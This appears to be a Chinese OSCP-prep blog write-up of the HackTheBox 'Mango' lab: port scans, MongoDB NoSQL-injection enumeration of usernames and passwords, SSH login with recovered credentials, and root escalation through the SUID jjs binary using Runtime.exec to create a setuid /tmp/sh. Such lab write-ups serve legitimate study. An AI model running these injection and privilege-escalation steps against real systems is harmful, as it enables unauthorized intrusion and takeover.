OSCP备考_0x23_HackThBox靶机_Linux_mango

Ethan医生2个月前靶场84

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.108.26 (扫描TCP)

image.png




nmap -sU --top-ports 100 10.129.108.26 (扫描UDP)

image.png



gobuster dir -u https://10.129.108.26/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php,txt,html -k





http://staging-order.mango.htb/

image.png

image.png

https://book.hacktricks.xyz/pentesting-web/nosql-injection

但是登录了没啥用也



然后使用[https://raw.githubusercontent.com/an0nlk/Nosql-MongoDB-injection-username-password-enumeration/master/nosqli-user-pass-enum.py ](https://raw.githubusercontent.com/an0nlk/Nosql-MongoDB-injection-username-password-enumeration/master/nosqli-user-pass-enum.py )这个脚本进行信息枚举

python3 nosqli-user-pass-enum.py -m post -up username -pp password -op login:login -u http://staging-order.mango.htb/ -ep username


然后继续枚举密码

python3 nosqli-user-pass-enum.py -m post -up username -pp password -op login:login -u http://staging-order.mango.htb/ -ep password

image.png

image.png

找到两个密码

h3mXK8RhU~f{]f5H

 t9KcS3>!0B#2

然后直接ssh登录

ssh mango@10.129.108.26

使用的是h3mXK8RhU~f{]f5H

登录之后使用

find / -perm -u=s 2>/dev/null

发现jss

image.png

执行/usr/lib/jvm/java-11-openjdk-amd64/bin/jjs
然后执行下面两条命令
Java.type('java.lang.Runtime').getRuntime().exec('cp /bin/sh /tmp/sh').waitFor()
Java.type('java.lang.Runtime').getRuntime().exec('chmod u+s /tmp/sh').waitFor()
提权到root
/tmp/sh -p

image.png


标签: OSCP

相关文章

OSCP备考_0x01_HackThBox靶机_Linux_Shocker

OSCP备考_0x01_HackThBox靶机_Linux_Shocker

先连接到外网开放的服务器openvpn xxx.ovpn信息收集nmap -p- 10.129.216.48 (这样扫描太慢了)nmap -sCV -p- --min-rate 10000 -T4 -...

OSCP备考_0x57_HackThBox靶机_Windows_Love

OSCP备考_0x57_HackThBox靶机_Windows_Love

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.48.103 (扫描TCP)绑定域名 http://10.129.48.103...

OSCP备考_0x42_HackThBox靶机_Windows_grandpa

OSCP备考_0x42_HackThBox靶机_Windows_grandpa

grandpanmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.95.233 (扫描TCP)跟上个靶场好像davtest -url 10....

OSCP备考_0x05_Vulnhub靶机_KIOPTRIX:2014 (#5)

OSCP备考_0x05_Vulnhub靶机_KIOPTRIX:2014 (#5)

名称说明靶机下载链接https://www.vulnhub.com/entry/kioptrix-2014-5,62/攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:1...

OSCP备考_0x52_HackThBox靶机_Windows_Buff

OSCP备考_0x52_HackThBox靶机_Windows_Buff

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.25.107 (扫描TCP)打开8080然后就是使用EXP然后就获取到SHELL然后EA...

OSCP备考_0x38_HackThBox靶机_Windows_Devel

OSCP备考_0x38_HackThBox靶机_Windows_Devel

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.254.198 (扫描TCP)使用ftp进行连接ftp 10.129.254.198 2...

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。